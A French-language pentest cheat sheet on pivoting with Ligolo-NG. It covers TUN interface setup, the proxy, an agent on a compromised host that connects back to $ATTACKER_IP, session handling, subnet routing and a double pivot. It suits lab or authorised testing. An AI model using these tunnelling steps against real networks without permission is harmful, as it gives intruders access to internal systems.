Pivoting

Ligolo-NG

Tunnel TUN kernel-space, routing de subnets internes et double pivot.

Setup - Interface

sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up

Crée et active l'interface TUN ligolo sur l'attaquant. À faire une seule fois par session.

sudo ip link delete ligolo

Supprime l'interface en fin de mission (nettoyage).

Proxy - Attaquant

./proxy -selfcert

Lance le proxy sur 0.0.0.0:11601 avec un certificat autosigné (adapté au lab).

Agent - Cible

./agent --connect $ATTACKER_IP:11601 --ignore-cert --retry

Connecte l'agent depuis la machine compromise vers le proxy. --retry maintient la connexion.

Session - Gestion

ligolo-ng » session

Liste les sessions actives en attente de sélection.

ligolo-ng » 1

Sélectionne la session numéro 1.

ligolo-ng » ifconfig

Affiche les interfaces réseau de la machine compromise, utile pour cartographier les subnets internes.

ligolo-ng » start

Lance le tunnel sur l'interface ligolo. Le trafic routé vers ligolo passe par la cible.

Routing - Subnets

sudo ip route add $SUBNET dev ligolo

Route un subnet interne via l'interface ligolo pour l'atteindre depuis l'attaquant.

ip route list

Vérifie les routes actives pour confirmer que le subnet est bien accessible.

sudo ip route del $SUBNET dev ligolo

Retire une route quand elle n'est plus nécessaire.

Double Pivot

sudo ip tuntap add user root mode tun ligolo2
sudo ip link set ligolo2 up

Crée une seconde interface TUN pour pivoter depuis une deuxième machine compromise.

ligolo-ng » listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp

Ouvre un listener sur l'agent (machine 1) qui redirige vers le proxy. Permet à l'agent 2 de s'y connecter.

ligolo-ng » tunnel_start --tun ligolo2

Lance le tunnel sur l'interface ligolo2 pour la session du second agent.

sudo ip route add $SUBNET2 dev ligolo2

Route le subnet du troisième segment via ligolo2.